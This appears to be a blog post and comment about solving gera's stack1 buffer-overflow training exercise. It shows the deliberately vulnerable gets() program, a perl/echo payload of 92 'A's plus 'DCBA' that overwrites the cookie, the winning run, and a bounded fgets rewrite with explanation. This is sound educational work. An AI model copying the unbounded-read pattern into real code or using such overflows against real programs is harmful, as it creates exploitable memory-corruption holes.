I've been supplementing my reading of Gray Hat Hacking, Second Edition: The Ethical Hacker's Handbook with gera's Insecure Programming by example.
#include <stdio.h>

/* stack1.c *
 * specially crafted to feed your brain by gera */
int main() {
    int cookie;                     /* sits above buf on the stack in this layout */
    char buf[80];
    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    gets(buf);                      /* unbounded read: the deliberate bug in this exercise */
    if (cookie == 0x41424344)       /* "DCBA" read as a little-endian int */
        printf("you win!\n");
}
$ perl -e 'print "A" x 92;' > of
$ echo "DCBA" >> of
$ stack1 < of
buf: bffff4b0 cookie: bffff50c
you win!
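As an added illustration (my own code, not from the post or from gera's exercises), here is why the trailing "DCBA" compares equal to 0x41424344 on a little-endian x86 stack, next to a bounded rewrite of stack1 that uses fgets so over-long input stops at the end of buf and never reaches cookie. The helper names and the 92-byte constructed input are my assumptions, mirroring the run above.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Interpret four ASCII bytes as a little-endian 32-bit integer. This is how
 * the bytes "DCBA" written past the end of buf are read back as the cookie
 * value 0x41424344 ('D'=0x44 lowest, 'A'=0x41 highest). */
uint32_t bytes_as_le32(const char *s) {
    return (uint32_t)(unsigned char)s[0]
         | (uint32_t)(unsigned char)s[1] << 8
         | (uint32_t)(unsigned char)s[2] << 16
         | (uint32_t)(unsigned char)s[3] << 24;
}

/* Bounded stand-in for stack1 (hypothetical name): fgets reads at most
 * sizeof(buf)-1 bytes, so input longer than the buffer is truncated instead
 * of overwriting neighbouring stack slots. Returns 1 when the cookie matches
 * (the "you win!" branch), 0 otherwise. With the overflow closed off, the
 * win branch is unreachable: cookie can only hold what the program put there. */
int stack1_safe(FILE *in) {
    int cookie = 0;                 /* initialised: comparing an indeterminate value is UB */
    char buf[80];
    if (fgets(buf, sizeof buf, in) == NULL)
        return 0;
    buf[strcspn(buf, "\n")] = '\0'; /* drop the trailing newline if present */
    if (cookie == 0x41424344) {
        printf("you win!\n");
        return 1;
    }
    return 0;
}

/* Feed a string to stack1_safe through a temporary stream (stands in for "< of"). */
int run_with_input(const char *input) {
    FILE *f = tmpfile();
    if (!f) return -1;
    fputs(input, f);
    rewind(f);
    int r = stack1_safe(f);
    fclose(f);
    return r;
}

/* Constructed input: the same 92 x 'A' + "DCBA" file the post builds with perl
 * and echo. Against the bounded version it is simply truncated to 79 bytes. */
int overflow_attempt(void) {
    char input[100];
    memset(input, 'A', 92);
    memcpy(input + 92, "DCBA\n", 6);
    return run_with_input(input);
}

int main(void) {
    printf("\"DCBA\" as little-endian int: 0x%08x\n", bytes_as_le32("DCBA"));
    printf("bounded stack1 with the 96-byte input returns %d\n", overflow_attempt());
    return 0;
}
```

The offset between buf and cookie is whatever the compiler chose for this stack frame (here 92 bytes including padding, 80 on another build), which is exactly the kind of layout detail the bounded read makes irrelevant.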
Strange that you ended up with 92, I had 80... some sort of compiler difference?
Here's my MD5:
d8dce899f15a83b224f6d21fe1c40cd6 stack1